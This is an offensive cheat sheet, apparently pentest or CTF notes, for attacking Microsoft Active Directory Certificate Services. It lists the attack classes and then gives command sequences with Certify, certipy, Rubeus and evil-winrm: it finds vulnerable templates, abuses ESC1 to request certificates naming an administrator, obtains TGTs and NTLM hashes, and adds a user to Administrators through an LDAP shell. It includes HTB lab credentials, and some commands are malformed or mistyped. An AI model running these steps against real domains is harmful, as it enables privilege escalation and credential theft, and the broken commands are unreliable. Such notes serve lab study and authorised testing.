AD CS is Microsoft’s PKI implementation that provides everything from encrypting file systems, to digital signatures, to user authentication (a large focus of our research), and more.
There are several different attack vectors including below.
Credential theft (dubbed THEFT1 to THEFT5)
Account persistence (dubbed PERSIST1 to PERSIST3)
Domain escalation (dubbed ESC1 to ESC8)
based on misconfigured certificate templates
based on dangerous CA configuration
related to access control vulnerabilities
based on an NTLM relay vulnerability related to the web endpoints of AD CS
Domain persistence (dubbed DPERSIST1 to DPERSIST3)
by forging certificates with a stolen CA certificates
by trusting rogue CA certificates
by maliciously creating vulnerable access controls
Initial Recon
# From UNIX-like systems:
Kali> rpc net group members "Cert Publishers" -U "DOMAIN"/"User"%"Password" -S "DomainController"
# From Windows systems:
CMD> net group "Cert Publishers" /domain
Vulnerability Check
# Windows
CMD> Certify.exe cas
CMD> Certify find /vulnerable
# Linux
Kali> certipy find -u 'user@domain.local' -p 'password' -dc-ip 'DC_IP' -vulnerable -stdout
Kali> certipy find -u Ryan.Cooper -p NuclearMosquito3 -target sequel.htb -text -stdout -vulnerable
Kali> certipy find -u 'user@domain.local' -p 'password' -dc-ip 'DC_IP' -old-bloodhound
#Certipy also supports BloodHound. With the -old-bloodhound option, the data will be exported for the original version of BloodHound. With the -bloodhound option, the data will be exported for the modified version of BloodHound, forked by Certipy's author (default output when no flag is set).
Certificate templates
Template allows SAN (ESC1)
When a certificate template allows to specify a subjectAltName, it is possible to request a certificate for another user. It can be used for privileges escalation if the EKU specifies Client Authentication or ANY.
# Find vulnerable/abusable certificate templates using default low-privileged group
CMD> Certify.exe find /vulnerable
# Find vulnerable/abusable certificate templates using all groups the current user context is a part of:
CMD> Certify.exe find /vulnerable /currentuser
# Once a vulnerable template is found, a request shall be made to obtain a certificate, with another high-priv user set as SAN (subjectAltName).
CMD> Certify.exe request /ca:'domain\ca' /template:"Vulnerable template" /altname:"admin"
# Create a cert.pem based on the base64 cert output by the command above, and convert it to pem format.
Kali> openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
# Obtain the TGT. You can convert it to a ccache format to use in Linux later
CMD> .\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /ptt
# Ask Credentials. You can conduct normal path the hash attack.
CMD> .\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials
See the Pass the Ticket section to convert the ticket to Linux format.
#To specify a user account in the SAN
Kali> certipy req -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca 'ca_name' -template 'vulnerable template' -upn 'domain admin'
certipy req -u Ryan.Cooper -p NuclearMosquito3 -target sequel.htb -upn Administrator@sequel.htb -ca sequel-DC-CA -template UserAuthentication
#To specify a computer account in the SAN
Kali> certipy req -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca 'ca_name' -template 'vulnerable template' -dns 'dc.domain.local'
# Obtain the TGT
Kali> certipy auth -pfx administrator.pfx
# After this, you can export it to the KRB5CCNAME variable, and run any commands you want with the new TGT privilege such as secredump/psexec, etc...
# Obtain the credentials
Kali> certipy auth -pfx <new cert>.pfx
# Typically, you get a NTLM hash.
# Pass the cert
# 1) Extract Public Key Cert and Private Key
Kali> certipy cert -pfx <new cert>.pfx -nokey -out user.crt
Kali> certipy cert -pfx <new cert>.pfx -nocert -out user.key
# 2) Create a ldap shell session with the Cert and Key
Kali> python3 -action ldap-shell -crt user.crt -key user.key -domain htb.corp -dc-ip
# #) Add a new user to Administrators
LDAP_SHELL> add_user_to_group svc_ldap Administrators
# Acccess to the target with new user and credential
Kali> evil-winrm -i -u 'svc_ldap@htb.corp' -p 'lDaP_1n_th3_cle4r!'
To fix CLOCK SKEY issue
# Synchronize time in case you have CLOCK SKEY issue.
Kali> sudo ntpdate <DC FQDN>
sudo ntupdate dc01.sequel.htb